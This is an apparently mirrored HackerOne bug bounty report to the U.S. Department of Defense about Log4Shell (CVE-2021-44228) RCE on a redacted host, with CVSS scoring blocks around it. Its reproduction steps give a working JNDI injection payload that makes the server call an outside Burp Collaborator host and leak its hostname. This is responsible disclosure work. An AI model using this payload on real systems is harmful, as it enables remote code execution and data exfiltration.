Lucene search

K
hackeroneMr_x_strangeH1:1429014
HistoryDec 16, 2021 - 6:32 p.m.

U.S. Dept Of Defense: Log4Shell: RCE 0-day exploit on █████████

2021-12-1618:32:13
mr_x_strange
hackerone.com
425

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

Hi team,
log4 shell is recent 0-day exploit it’s Java package vulnerable. ██████████ domain is vulnerable

Impact

RCE

System Host(s)

█████████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-44228

Steps to Reproduce

  1. Go to this url => https://███████/██████=%24{jndi%3Aldap%3A%2F%2Fx%24{hostName}.LOG45200SSRF.xxxxxx.burpcollaborator.net%2Fa}
  2. paste the poc code on ██████ url parameter
  3. like this => https://██████████/██████
  4. then burp collaborator received reverse ping back
  5. I attached poc videos and photos below

##POC CODE
${jndi:ldap://x${hostName}.log4j.xxxxxxx.burpcollaborator.net/a}

Suggested Mitigation/Remediation Actions

https://www.lunasec.io/docs/blog/log4j-zero-day/

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%